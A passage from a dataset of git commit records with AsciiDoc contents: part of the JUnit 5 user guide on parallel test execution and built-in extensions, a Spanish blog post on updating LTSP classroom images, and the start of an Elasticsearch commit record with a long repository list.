might\nconflict with the configured execution order. Thus, in both cases, test methods in such\ntest classes are only executed concurrently if the `@Execution(CONCURRENT)` annotation is\npresent on the test class or method.\n\nAll nodes of the test tree that are configured with the `CONCURRENT` execution mode will\nbe executed fully in parallel according to the provided\n<<writing-tests-parallel-execution-config, configuration>> while observing the\ndeclarative <<writing-tests-parallel-execution-synchronization, synchronization>>\nmechanism. Please note that <<running-tests-capturing-output>> needs to be enabled\nseparately.\n\n[[writing-tests-parallel-execution-config]]\n==== Configuration\n\nProperties such as the desired parallelism and the maximum pool size can be configured\nusing a `{ParallelExecutionConfigurationStrategy}`. The JUnit Platform provides two\nimplementations out of the box: `dynamic` and `fixed`. Alternatively, you may implement a\n`custom` strategy.\n\nTo select a strategy, set the `junit.jupiter.execution.parallel.config.strategy`\nconfiguration parameter to one of the following options.\n\n`dynamic`::\n Computes the desired parallelism based on the number of available processors\/cores\n multiplied by the `junit.jupiter.execution.parallel.config.dynamic.factor`\n configuration parameter (defaults to `1`).\n\n`fixed`::\n Uses the mandatory `junit.jupiter.execution.parallel.config.fixed.parallelism`\n configuration parameter as the desired parallelism.\n\n`custom`::\n Allows you to specify a custom `{ParallelExecutionConfigurationStrategy}`\n implementation via the mandatory `junit.jupiter.execution.parallel.config.custom.class`\n configuration parameter to determine the desired configuration.\n\nIf no configuration strategy is set, JUnit Jupiter uses the `dynamic` configuration\nstrategy with a factor of `1`. Consequently, the desired parallelism will be equal to the\nnumber of available processors\/cores.\n\n.Parallelism does not imply maximum number of concurrent threads\nNOTE: JUnit Jupiter does not guarantee that the number of concurrently executing tests\nwill not exceed the configured parallelism. For example, when using one of the\nsynchronization mechanisms described in the next section, the `ForkJoinPool` that is used\nbehind the scenes may spawn additional threads to ensure execution continues with\nsufficient parallelism. Thus, if you require such guarantees in a test class, please use\nyour own means of controlling concurrency.\n\n[[writing-tests-parallel-execution-synchronization]]\n==== Synchronization\n\nIn addition to controlling the execution mode using the `{Execution}` annotation, JUnit\nJupiter provides another annotation-based declarative synchronization mechanism. The\n`{ResourceLock}` annotation allows you to declare that a test class or method uses a\nspecific shared resource that requires synchronized access to ensure reliable test\nexecution. The shared resource is identified by a unique name which is a `String`. The\nname can be user-defined or one of the predefined constants in `{Resources}`:\n`SYSTEM_PROPERTIES`, `SYSTEM_OUT`, `SYSTEM_ERR`, `LOCALE`, or `TIME_ZONE`.\n\nIf the tests in the following example were run in parallel _without_ the use of\n{ResourceLock}, they would be _flaky_. Sometimes they would pass, and at other times they\nwould fail due to the inherent race condition of writing and then reading the same JVM\nSystem Property.\n\nWhen access to shared resources is declared using the {ResourceLock} annotation, the\nJUnit Jupiter engine uses this information to ensure that no conflicting tests are run in\nparallel.\n\nIn addition to the `String` that uniquely identifies the shared resource, you may specify\nan access mode. Two tests that require `READ` access to a shared resource may run in\nparallel with each other but not while any other test that requires `READ_WRITE` access\nto the same shared resource is running.\n\n[source,java]\n----\ninclude::{testDir}\/example\/SharedResourcesDemo.java[tags=user_guide]\n----\n\n\n[[writing-tests-built-in-extensions]]\n=== Built-in Extensions\n\nWhile the JUnit team encourages reusable extensions to be packaged and maintained in\nseparate libraries, the JUnit Jupiter API artifact includes a few user-facing extension\nimplementations that are considered so generally useful that users shouldn't have to add\nanother dependency.\n\n[[writing-tests-built-in-extensions-TempDirectory]]\n==== The TempDirectory Extension\n\nThe `TempDirectory` extension can be used to create and clean up a temporary directory\nfor an individual test or all tests in a test class. To use it, register the extension\nand add a parameter of type `java.nio.file.Path` annotated with `@TempDir` to your test\nmethod, lifecycle method, or test class constructor.\n\nFor example, the following test registers the extension for a single test method, creates\nand writes to a file in the temporary directory, and checks its content.\n\n[source,java,indent=0]\n.A test method that requires a temporary directory\n----\ninclude::{testDir}\/example\/TempDirectoryDemo.java[tags=user_guide]\n----\n\nIn addition to the default file system for the local operating system, the\n`TempDirectory` extension can also be used with any `FileSystem` implementation -- for\nexample, https:\/\/github.com\/google\/jimfs[Jimfs]. In order to use a custom file system,\nregister the extension _programmatically_ via `@RegisterExtension` and supply a provider\nof a custom parent directory of type `Path`. The following example uses the Jimfs\n`FileSystem` and passes a custom `tmp` parent directory to the\n`createInCustomDirectory()` static factory method.\n\n[source,java]\n.A test class that configures the TempDirectory extension to use a custom file system\n----\ninclude::{testDir}\/example\/TempDirectoryWithCustomFileSystemDemo.java[tags=user_guide]\n----\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a0b607900df78702048b3fefcdf8eb6392b5db58","subject":"Update 2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","message":"Update 2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_contents":"= LTSP Images servidas por Servidor de Aula\n\n:published_at: 2016-01-18\n:hp-tags: LTSP, aula, aula-servidor\n:hp-image: http:\/\/www.greaterlatrobe.net\/seniorcenter\/Computer%20Classroom%2010-05.jpg\n\n\nEn las aulas los Servidores de Aula _(ordenador del profesor)_ se encargan de ofrecer la imagen a arrancar a los LTSP _(ordenadores de los alumnos)_\n\nLos LTSP tienen activada la funcionalidad para pedir una imagen a trav\u00e9s de la Red, el Servidor de Aula es el encargado de proveer internet a los LTSP al mismo tiempo que hace de servidor DHCP.\n\n== Imagen LTSP\n\nLos archivos que hacen de imagen para los LTSP est\u00e1n en \n\n----\n\/opt\/i386\n----\n\n\nSe puede montar la imagen en el servidor de aula con\n\n----\nchroot \/opt\/i386\n----\n\n== Procesar imagen para LTSP\n\nLa imagen que se env\u00eda no es exactamente lo que hay en esa carpeta, hay que hacer un proceso de procesado y compresi\u00f3n, el archivo resultante es lo que se enviar\u00e1 a los LTSP cada vez que se arranquen.\n\nPara ello hay que ejecutar\n\n----\nltsp-update-image --arch i386\n----\n\nUna vez termine ese proceso cuando los LTSP vuelvan a arrancar tendr\u00e1n la nueva imagen con los cambios realizados\n\n\n\n\n\n\n\n","old_contents":"= LTSP Images servidas por Servidor de Aula\n\n:published_at: 2016-01-18\n:hp-tags: LTSP, aula, aula-servidor\n:hp-image: http:\/\/www.greaterlatrobe.net\/seniorcenter\/Computer%20Classroom%2010-05.jpg\n\n\nDurante este post vamos a comentar como se inician los LTSP en las aulas\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e1a2d76626fddab44e925ef6585ad1ea4b9d54a8","subject":"Fixing typo in the first JSON example","message":"Fixing typo in the first JSON example\n\nCloses #7172\n","repos":"kunallimaye\/elasticsearch,phani546\/elasticsearch,AleksKochev\/elasticsearch,kimimj\/elasticsearch,achow\/elasticsearch,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,anti-social\/elasticsearch,mnylen\/elasticsearch,petmit\/elasticsearch,nknize\/elasticsearch,mm0\/elasticsearch,palecur\/elasticsearch,kingaj\/elasticsearch,diendt\/elasticsearch,tahaemin\/elasticsearch,socialrank\/elasticsearch,episerver\/elasticsearch,bestwpw\/elasticsearch,hanst\/elasticsearch,zeroctu\/elasticsearch,ulkas\/elasticsearch,iamjakob\/elasticsearch,MetSystem\/elasticsearch,gingerwizard\/elasticsearch,Shekharrajak\/elasticsearch,tahaemin\/elasticsearch,lchennup\/elasticsearch,onegambler\/elasticsearch,mikemccand\/elasticsearch,scottsom\/elasticsearch,dylan8902\/elasticsearch,mrorii\/elasticsearch,nrkkalyan\/elasticsearch,luiseduardohdbackup\/elasticsearch,kalburgimanjunath\/elasticsearch,hydro2k\/elasticsearch,vrkansagara\/elasticsearch,aglne\/elasticsearch,szroland\/elasticsearch,polyfractal\/elasticsearch,jeteve\/elasticsearch,karthikjaps\/elasticsearch,yynil\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,dylan8902\/elasticsearch,humandb\/elasticsearch,jimczi\/elasticsearch,AleksKochev\/elasticsearch,chirilo\/elasticsearch,njlawton\/elasticsearch,petabytedata\/elasticsearch,jeteve\/elasticsearch,sscarduzio\/elasticsearch,kevinkluge\/elasticsearch,Shekharrajak\/elasticsearch,i-am-Nathan\/elasticsearch,fforbeck\/elasticsearch,nilabhsagar\/elasticsearch,markwalkom\/elasticsearch,mmaracic\/elasticsearch,weipinghe\/elasticsearch,zhiqinghuang\/elasticsearch,rmuir\/elasticsearch,nazarewk\/elasticsearch,phani546\/elasticsearch,drewr\/elasticsearch,elasticdog\/elasticsearch,mnylen\/elasticsearch,ImpressTV\/elasticsearch,tahaemin\/elasticsearch,elancom\/elasticsearch,areek\/elasticsearch,mkis-\/elasticsearch,schonfeld\/elasticsearch,umeshdangat\/elasticsearch,Widen\/elasticsearch,likaiwalkman\/elasticsearch,jpountz\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,ouyangkongtong\/elasticsearch,easonC\/elasticsearch,Clairebi\/ElasticsearchClone,apepper\/elasticsearch,martinstuga\/elasticsearch,ckclark\/elasticsearch,tebriel\/elasticsearch,huanzhong\/elasticsearch,KimTaehee\/elasticsearch,cwurm\/elasticsearch,NBSW\/elasticsearch,bestwpw\/elasticsearch,janmejay\/elasticsearch,truemped\/elasticsearch,ivansun1010\/elasticsearch,Helen-Zhao\/elasticsearch,milodky\/elasticsearch,nrkkalyan\/elasticsearch,Shepard1212\/elasticsearch,jimczi\/elasticsearch,markharwood\/elasticsearch,clintongormley\/elasticsearch,rhoml\/elasticsearch,slavau\/elasticsearch,coding0011\/elasticsearch,LewayneNaidoo\/elasticsearch,lydonchandra\/elasticsearch,F0lha\/elasticsearch,Collaborne\/elasticsearch,kimimj\/elasticsearch,gmarz\/elasticsearch,masaruh\/elasticsearch,mrorii\/elasticsearch,onegambler\/elasticsearch,andrestc\/elasticsearch,avikurapati\/elasticsearch,fekaputra\/elasticsearch,gingerwizard\/elasticsearch,ESamir\/elasticsearch,alexkuk\/elasticsearch,petabytedata\/elasticsearch,brandonkearby\/elasticsearch,nomoa\/elasticsearch,petmit\/elasticsearch,ajhalani\/elasticsearch,hanst\/elasticsearch,jpountz\/elasticsearch,overcome\/elasticsearch,masterweb121\/elasticsearch,jbertouch\/elasticsearch,vvcephei\/elasticsearch,Clairebi\/ElasticsearchClone,jw0201\/elastic,C-Bish\/elasticsearch,luiseduardohdbackup\/elasticsearch,fekaputra\/elasticsearch,adrianbk\/elasticsearch,masterweb121\/elasticsearch,boliza\/elasticsearch,iacdingping\/elasticsearch,gfyoung\/elasticsearch,zkidkid\/elasticsearch,Widen\/elasticsearch,khiraiwa\/elasticsearch,jsgao0\/elasticsearch,Asimov4\/elasticsearch,humandb\/elasticsearch,weipinghe\/elasticsearch,heng4fun\/elasticsearch,gfyoung\/elasticsearch,tahaemin\/elasticsearch,combinatorist\/elasticsearch,amit-shar\/elasticsearch,LeoYao\/elasticsearch,mgalushka\/elasticsearch,iacdingping\/elasticsearch,jpountz\/elasticsearch,ouyangkongtong\/elasticsearch,elancom\/elasticsearch,JSCooke\/elasticsearch,kimimj\/elasticsearch,StefanGor\/elasticsearch,sscarduzio\/elasticsearch,Collaborne\/elasticsearch,Widen\/elasticsearch,achow\/elasticsearch,luiseduardohdbackup\/elasticsearch,fekaputra\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,hirdesh2008\/elasticsearch,tsohil\/elasticsearch,hafkensite\/elasticsearch,cnfire\/elasticsearch-1,trangvh\/elasticsearch,GlenRSmith\/elasticsearch,alexbrasetvik\/elasticsearch,Liziyao\/elasticsearch,golubev\/elasticsearch,hanswang\/elasticsearch,hechunwen\/elasticsearch,strapdata\/elassandra-test,VukDukic\/elasticsearch,tkssharma\/elasticsearch,avikurapati\/elasticsearch,LeoYao\/elasticsearch,iacdingping\/elasticsearch,rhoml\/elasticsearch,awislowski\/elasticsearch,socialrank\/elasticsearch,coding0011\/elasticsearch,lzo\/elasticsearch-1,smflorentino\/elasticsearch,winstonewert\/elasticsearch,spiegela\/elasticsearch,wuranbo\/elasticsearch,nazarewk\/elasticsearch,girirajsharma\/elasticsearch,Shepard1212\/elasticsearch,mortonsykes\/elasticsearch,wimvds\/elasticsearch,wuranbo\/elasticsearch,skearns64\/elasticsearch,wayeast\/elasticsearch,Clairebi\/ElasticsearchClone,wangtuo\/elasticsearch,vietlq\/elasticsearch,TonyChai24\/ESSource,mcku\/elasticsearch,iacdingping\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,zhiqinghuang\/elasticsearch,franklanganke\/elasticsearch,ThalaivaStars\/OrgRepo1,milodky\/elasticsearch,pablocastro\/elasticsearch,mute\/elasticsearch,strapdata\/elassandra,baishuo\/elasticsearch_v2.1.0-baishuo,schonfeld\/elasticsearch,ckclark\/elasticsearch,sarwarbhuiyan\/elasticsearch,masaruh\/elasticsearch,rento19962\/elasticsearch,sarwarbhuiyan\/elasticsearch,MetSystem\/elasticsearch,nrkkalyan\/elasticsearch,szroland\/elasticsearch,amit-shar\/elasticsearch,obourgain\/elasticsearch,jw0201\/elastic,fekaputra\/elasticsearch,vroyer\/elasticassandra,sauravmondallive\/elasticsearch,geidies\/elasticsearch,kcompher\/elasticsearch,kalburgimanjunath\/elasticsearch,wbowling\/elasticsearch,jaynblue\/elasticsearch,huanzhong\/elasticsearch,dongjoon-hyun\/elasticsearch,golubev\/elasticsearch,wangtuo\/elasticsearch,smflorentino\/elasticsearch,ESamir\/elasticsearch,lzo\/elasticsearch-1,huanzhong\/elasticsearch,myelin\/elasticsearch,franklanganke\/elasticsearch,hanst\/elasticsearch,Shekharrajak\/elasticsearch,brwe\/elasticsearch,ESamir\/elasticsearch,djschny\/elasticsearch,Uiho\/elasticsearch,Kakakakakku\/elasticsearch,lightslife\/elasticsearch,gingerwizard\/elasticsearch,kunallimaye\/elasticsearch,hydro2k\/elasticsearch,uschindler\/elasticsearch,szroland\/elasticsearch,karthikjaps\/elasticsearch,opendatasoft\/elasticsearch,mbrukman\/elasticsearch,sarwarbhuiyan\/elasticsearch,pablocastro\/elasticsearch,nknize\/elasticsearch,zkidkid\/elasticsearch,Brijeshrpatel9\/elasticsearch,himanshuag\/elasticsearch,dantuffery\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ulkas\/elasticsearch,xpandan\/elasticsearch,rajanm\/elasticsearch,Fsero\/elasticsearch,masterweb121\/elasticsearch,bestwpw\/elasticsearch,Asimov4\/elasticsearch,dataduke\/elasticsearch,strapdata\/elassandra,wayeast\/elasticsearch,Asimov4\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,jbertouch\/elasticsearch,camilojd\/elasticsearch,rento19962\/elasticsearch,kenshin233\/elasticsearch,mjhennig\/elasticsearch,drewr\/elasticsearch,rento19962\/elasticsearch,schonfeld\/elasticsearch,acchen97\/elasticsearch,xpandan\/elasticsearch,ZTE-PaaS\/elasticsearch,kaneshin\/elasticsearch,yynil\/elasticsearch,beiske\/elasticsearch,fred84\/elasticsearch,KimTaehee\/elasticsearch,masterweb121\/elasticsearch,JervyShi\/elasticsearch,jpountz\/elasticsearch,mm0\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,caengcjd\/elasticsearch,petabytedata\/elasticsearch,fooljohnny\/elasticsearch,wittyameta\/elasticsearch,C-Bish\/elasticsearch,kenshin233\/elasticsearch,socialrank\/elasticsearch,javachengwc\/elasticsearch,vvcephei\/elasticsearch,markharwood\/elasticsearch,vrkansagara\/elasticsearch,dataduke\/elasticsearch,JervyShi\/elasticsearch,tebriel\/elasticsearch,yongminxia\/elasticsearch,myelin\/elasticsearch,jimhooker2002\/elasticsearch,nrkkalyan\/elasticsearch,fernandozhu\/elasticsearch,Helen-Zhao\/elasticsearch,djschny\/elasticsearch,vvcephei\/elasticsearch,hanswang\/elasticsearch,winstonewert\/elasticsearch,mm0\/elasticsearch,sjohnr\/elasticsearch,caengcjd\/elasticsearch,EasonYi\/elasticsearch,xuzha\/elasticsearch,franklanganke\/elasticsearch,wbowling\/elasticsearch,Asimov4\/elasticsearch,infusionsoft\/elasticsearch,njlawton\/elasticsearch,18098924759\/elasticsearch,Liziyao\/elasticsearch,Rygbee\/elasticsearch,strapdata\/elassandra-test,kevinkluge\/elasticsearch,Ansh90\/elasticsearch,easonC\/elasticsearch,MisterAndersen\/elasticsearch,nomoa\/elasticsearch,sscarduzio\/elasticsearch,ThalaivaStars\/OrgRepo1,zkidkid\/elasticsearch,LewayneNaidoo\/elasticsearch,kenshin233\/elasticsearch,koxa29\/elasticsearch,jaynblue\/elasticsearch,chrismwendt\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,shreejay\/elasticsearch,awislowski\/elasticsearch,zkidkid\/elasticsearch,easonC\/elasticsearch,snikch\/elasticsearch,kingaj\/elasticsearch,onegambler\/elasticsearch,amaliujia\/elasticsearch,mkis-\/elasticsearch,combinatorist\/elasticsearch,beiske\/elasticsearch,sauravmondallive\/elasticsearch,nrkkalyan\/elasticsearch,truemped\/elasticsearch,jimhooker2002\/elasticsearch,Microsoft\/elasticsearch,codebunt\/elasticsearch,scottsom\/elasticsearch,abibell\/elasticsearch,javachengwc\/elasticsearch,C-Bish\/elasticsearch,liweinan0423\/elasticsearch,cnfire\/elasticsearch-1,mkis-\/elasticsearch,Ansh90\/elasticsearch,winstonewert\/elasticsearch,rlugojr\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,mkis-\/elasticsearch,acchen97\/elasticsearch,abibell\/elasticsearch,mgalushka\/elasticsearch,mcku\/elasticsearch,pranavraman\/elasticsearch,loconsolutions\/elasticsearch,ImpressTV\/elasticsearch,tebriel\/elasticsearch,hanst\/elasticsearch,ydsakyclguozi\/elasticsearch,EasonYi\/elasticsearch,iantruslove\/elasticsearch,dantuffery\/elasticsearch,Asimov4\/elasticsearch,mbrukman\/elasticsearch,Brijeshrpatel9\/elasticsearch,huypx1292\/elasticsearch,nellicus\/elasticsearch,wittyameta\/elasticsearch,mjhennig\/elasticsearch,Helen-Zhao\/elasticsearch,kalimatas\/elasticsearch,VukDukic\/elasticsearch,kkirsche\/elasticsearch,henakamaMSFT\/elasticsearch,henakamaMSFT\/elasticsearch,mcku\/elasticsearch,andrestc\/elasticsearch,andrestc\/elasticsearch,markllama\/elasticsearch,Kakakakakku\/elasticsearch,GlenRSmith\/elasticsearch,wimvds\/elasticsearch,elancom\/elasticsearch,ydsakyclguozi\/elasticsearch,xuzha\/elasticsearch,sreeramjayan\/elasticsearch,iamjakob\/elasticsearch,strapdata\/elassandra5-rc,kubum\/elasticsearch,springning\/elasticsearch,markharwood\/elasticsearch,xuzha\/elasticsearch,andrestc\/elasticsearch,cnfire\/elasticsearch-1,linglaiyao1314\/elasticsearch,infusionsoft\/elasticsearch,hirdesh2008\/elasticsearch,liweinan0423\/elasticsearch,maddin2016\/elasticsearch,karthikjaps\/elasticsearch,camilojd\/elasticsearch,drewr\/elasticsearch,easonC\/elasticsearch,Rygbee\/elasticsearch,PhaedrusTheGreek\/elasticsearch,geidies\/elasticsearch,awislowski\/elasticsearch,a2lin\/elasticsearch,Widen\/elasticsearch,mnylen\/elasticsearch,snikch\/elasticsearch,nomoa\/elasticsearch,truemped\/elasticsearch,xingguang2013\/elasticsearch,i-am-Nathan\/elasticsearch,acchen97\/elasticsearch,wenpos\/elasticsearch,javachengwc\/elasticsearch,vingupta3\/elasticsearch,jango2015\/elasticsearch,YosuaMichael\/elasticsearch,liweinan0423\/elasticsearch,fred84\/elasticsearch,combinatorist\/elasticsearch,yongminxia\/elasticsearch,yuy168\/elasticsearch,MichaelLiZhou\/elasticsearch,humandb\/elasticsearch,fred84\/elasticsearch,onegambler\/elasticsearch,fernandozhu\/elasticsearch,vvcephei\/elasticsearch,umeshdangat\/elasticsearch,karthikjaps\/elasticsearch,MjAbuz\/elasticsearch,xuzha\/elasticsearch,ajhalani\/elasticsearch,ydsakyclguozi\/elasticsearch,robin13\/elasticsearch,Flipkart\/elasticsearch,Ansh90\/elasticsearch,maddin2016\/elasticsearch,petmit\/elasticsearch,apepper\/elasticsearch,clintongormley\/elasticsearch,lmtwga\/elasticsearch,micpalmia\/elasticsearch,linglaiyao1314\/elasticsearch,kalburgimanjunath\/elasticsearch,dpursehouse\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jbertouch\/elasticsearch,pozhidaevak\/elasticsearch,alexbrasetvik\/elasticsearch,brwe\/elasticsearch,shreejay\/elasticsearch,sdauletau\/elasticsearch,KimTaehee\/elasticsearch,feiqitian\/elasticsearch,mapr\/elasticsearch,tkssharma\/elasticsearch,Microsoft\/elasticsearch,jsgao0\/elasticsearch,socialrank\/elasticsearch,mjhennig\/elasticsearch,petmit\/elasticsearch,nellicus\/elasticsearch,mohit\/elasticsearch,zhiqinghuang\/elasticsearch,luiseduardohdbackup\/elasticsearch,djschny\/elasticsearch,diendt\/elasticsearch,sposam\/elasticsearch,pritishppai\/elasticsearch,SergVro\/elasticsearch,bestwpw\/elasticsearch,martinstuga\/elasticsearch,ulkas\/elasticsearch,Siddartha07\/elasticsearch,jaynblue\/elasticsearch,sjohnr\/elasticsearch,Siddartha07\/elasticsearch,pritishppai\/elasticsearch,vietlq\/elasticsearch,areek\/elasticsearch,smflorentino\/elasticsearch,chrismwendt\/elasticsearch,lchennup\/elasticsearch,elasticdog\/elasticsearch,vroyer\/elassandra,szroland\/elasticsearch,xingguang2013\/elasticsearch,rajanm\/elasticsearch,MjAbuz\/elasticsearch,cnfire\/elasticsearch-1,tahaemin\/elasticsearch,infusionsoft\/elasticsearch,jeteve\/elasticsearch,markharwood\/elasticsearch,MichaelLiZhou\/elasticsearch,aglne\/elasticsearch,karthikjaps\/elasticsearch,lks21c\/elasticsearch,nezirus\/elasticsearch,njlawton\/elasticsearch,episerver\/elasticsearch,wuranbo\/elasticsearch,tsohil\/elasticsearch,Brijeshrpatel9\/elasticsearch,sposam\/elasticsearch,luiseduardohdbackup\/elasticsearch,kubum\/elasticsearch,slavau\/elasticsearch,iacdingping\/elasticsearch,lightslife\/elasticsearch,ricardocerq\/elasticsearch,queirozfcom\/elasticsearch,mute\/elasticsearch,jango2015\/elasticsearch,Liziyao\/elasticsearch,hechunwen\/elasticsearch,wbowling\/elasticsearch,caengcjd\/elasticsearch,jw0201\/elastic,Clairebi\/ElasticsearchClone,NBSW\/elasticsearch,rento19962\/elasticsearch,andrestc\/elasticsearch,obourgain\/elasticsearch,jimhooker2002\/elasticsearch,glefloch\/elasticsearch,MetSystem\/elasticsearch,palecur\/elasticsearch,HarishAtGitHub\/elasticsearch,sauravmondallive\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,khiraiwa\/elasticsearch,Flipkart\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nrkkalyan\/elasticsearch,s1monw\/elasticsearch,martinstuga\/elasticsearch,dantuffery\/elasticsearch,rhoml\/elasticsearch,lightslife\/elasticsearch,mrorii\/elasticsearch,ricardocerq\/elasticsearch,andrejserafim\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,dpursehouse\/elasticsearch,18098924759\/elasticsearch,vvcephei\/elasticsearch,ckclark\/elasticsearch,TonyChai24\/ESSource,ESamir\/elasticsearch,vrkansagara\/elasticsearch,kalimatas\/elasticsearch,Siddartha07\/elasticsearch,wimvds\/elasticsearch,Liziyao\/elasticsearch,btiernay\/elasticsearch,areek\/elasticsearch,loconsolutions\/elasticsearch,polyfractal\/elasticsearch,fekaputra\/elasticsearch,jchampion\/elasticsearch,strapdata\/elassandra,IanvsPoplicola\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,HarishAtGitHub\/elasticsearch,dongjoon-hyun\/elasticsearch,kalburgimanjunath\/elasticsearch,kunallimaye\/elasticsearch,overcome\/elasticsearch,hafkensite\/elasticsearch,apepper\/elasticsearch,rajanm\/elasticsearch,sjohnr\/elasticsearch,phani546\/elasticsearch,iantruslove\/elasticsearch,kimimj\/elasticsearch,girirajsharma\/elasticsearch,kingaj\/elasticsearch,slavau\/elasticsearch,wimvds\/elasticsearch,18098924759\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ZTE-PaaS\/elasticsearch,kingaj\/elasticsearch,loconsolutions\/elasticsearch,ESamir\/elasticsearch,myelin\/elasticsearch,scorpionvicky\/elasticsearch,xpandan\/elasticsearch,SergVro\/elasticsearch,yanjunh\/elasticsearch,wenpos\/elasticsearch,MichaelLiZhou\/elasticsearch,adrianbk\/elasticsearch,ricardocerq\/elasticsearch,fred84\/elasticsearch,dantuffery\/elasticsearch,yynil\/elasticsearch,sdauletau\/elasticsearch,IanvsPoplicola\/elasticsearch,artnowo\/elasticsearch,a2lin\/elasticsearch,acchen97\/elasticsearch,MaineC\/elasticsearch,codebunt\/elasticsearch,milodky\/elasticsearch,18098924759\/elasticsearch,MetSystem\/elasticsearch,jango2015\/elasticsearch,opendatasoft\/elasticsearch,kkirsche\/elasticsearch,MisterAndersen\/elasticsearch,bestwpw\/elasticsearch,mapr\/elasticsearch,Charlesdong\/elasticsearch,xingguang2013\/elasticsearch,vingupta3\/elasticsearch,mbrukman\/elasticsearch,mgalushka\/elasticsearch,i-am-Nathan\/elasticsearch,sposam\/elasticsearch,yuy168\/elasticsearch,rhoml\/elasticsearch,F0lha\/elasticsearch,rlugojr\/elasticsearch,amaliujia\/elasticsearch,kimimj\/elasticsearch,ulkas\/elasticsearch,mortonsykes\/elasticsearch,dylan8902\/elasticsearch,djschny\/elasticsearch,Stacey-Gammon\/elasticsearch,AndreKR\/elasticsearch,wittyameta\/elasticsearch,wenpos\/elasticsearch,wbowling\/elasticsearch,dataduke\/elasticsearch,mohit\/elasticsearch,girirajsharma\/elasticsearch,mortonsykes\/elasticsearch,HarishAtGitHub\/elasticsearch,ckclark\/elasticsearch,AshishThakur\/elasticsearch,btiernay\/elasticsearch,Liziyao\/elasticsearch,nellicus\/elasticsearch,micpalmia\/elasticsearch,wangyuxue\/elasticsearch,coding0011\/elasticsearch,EasonYi\/elasticsearch,lmtwga\/elasticsearch,jprante\/elasticsearch,winstonewert\/elasticsearch,abibell\/elasticsearch,Chhunlong\/elasticsearch,wayeast\/elasticsearch,kevinkluge\/elasticsearch,slavau\/elasticsearch,rento19962\/elasticsearch,sc0ttkclark\/elasticsearch,wittyameta\/elasticsearch,ouyangkongtong\/elasticsearch,trangvh\/elasticsearch,JervyShi\/elasticsearch,btiernay\/elasticsearch,Ansh90\/elasticsearch,F0lha\/elasticsearch,HonzaKral\/elasticsearch,zhiqinghuang\/elasticsearch,F0lha\/elasticsearch,fekaputra\/elasticsearch,onegambler\/elasticsearch,alexbrasetvik\/elasticsearch,kcompher\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,nilabhsagar\/elasticsearch,mcku\/elasticsearch,scottsom\/elasticsearch,MetSystem\/elasticsearch,Microsoft\/elasticsearch,gingerwizard\/elasticsearch,thecocce\/elasticsearch,cwurm\/elasticsearch,sc0ttkclark\/elasticsearch,hirdesh2008\/elasticsearch,Charlesdong\/elasticsearch,lchennup\/elasticsearch,brandonkearby\/elasticsearch,elancom\/elasticsearch,andrejserafim\/elasticsearch,Chhunlong\/elasticsearch,pozhidaevak\/elasticsearch,hydro2k\/elasticsearch,vietlq\/elasticsearch,yongminxia\/elasticsearch,HonzaKral\/elasticsearch,naveenhooda2000\/elasticsearch,snikch\/elasticsearch,socialrank\/elasticsearch,yongminxia\/elasticsearch,kimimj\/elasticsearch,Siddartha07\/elasticsearch,Rygbee\/elasticsearch,jsgao0\/elasticsearch,yanjunh\/elasticsearch,easonC\/elasticsearch,zhiqinghuang\/elasticsearch,nrkkalyan\/elasticsearch,jchampion\/elasticsearch,StefanGor\/elasticsearch,umeshdangat\/elasticsearch,avikurapati\/elasticsearch,NBSW\/elasticsearch,NBSW\/elasticsearch,ajhalani\/elasticsearch,Charlesdong\/elasticsearch,jimhooker2002\/elasticsearch,gmarz\/elasticsearch,episerver\/elasticsearch,kunallimaye\/elasticsearch,himanshuag\/elasticsearch,chrismwendt\/elasticsearch,myelin\/elasticsearch,jsgao0\/elasticsearch,mapr\/elasticsearch,tcucchietti\/elasticsearch,hydro2k\/elasticsearch,a2lin\/elasticsearch,MaineC\/elasticsearch,kimimj\/elasticsearch,EasonYi\/elasticsearch,golubev\/elasticsearch,Kakakakakku\/elasticsearch,Charlesdong\/elasticsearch,adrianbk\/elasticsearch,henakamaMSFT\/elasticsearch,fooljohnny\/elasticsearch,strapdata\/elassandra-test,hirdesh2008\/elasticsearch,ouyangkongtong\/elasticsearch,gfyoung\/elasticsearch,trangvh\/elasticsearch,JackyMai\/elasticsearch,jimhooker2002\/elasticsearch,mohit\/elasticsearch,franklanganke\/elasticsearch,ThalaivaStars\/OrgRepo1,gingerwizard\/elasticsearch,apepper\/elasticsearch,micpalmia\/elasticsearch,heng4fun\/elasticsearch,nellicus\/elasticsearch,tebriel\/elasticsearch,xingguang2013\/elasticsearch,mgalushka\/elasticsearch,robin13\/elasticsearch,KimTaehee\/elasticsearch,Stacey-Gammon\/elasticsearch,kubum\/elasticsearch,EasonYi\/elasticsearch,pritishppai\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,ivansun1010\/elasticsearch,zeroctu\/elasticsearch,sc0ttkclark\/elasticsearch,pritishppai\/elasticsearch,lydonchandra\/elasticsearch,tcucchietti\/elasticsearch,AndreKR\/elasticsearch,Collaborne\/elasticsearch,Shekharrajak\/elasticsearch,Charlesdong\/elasticsearch,aglne\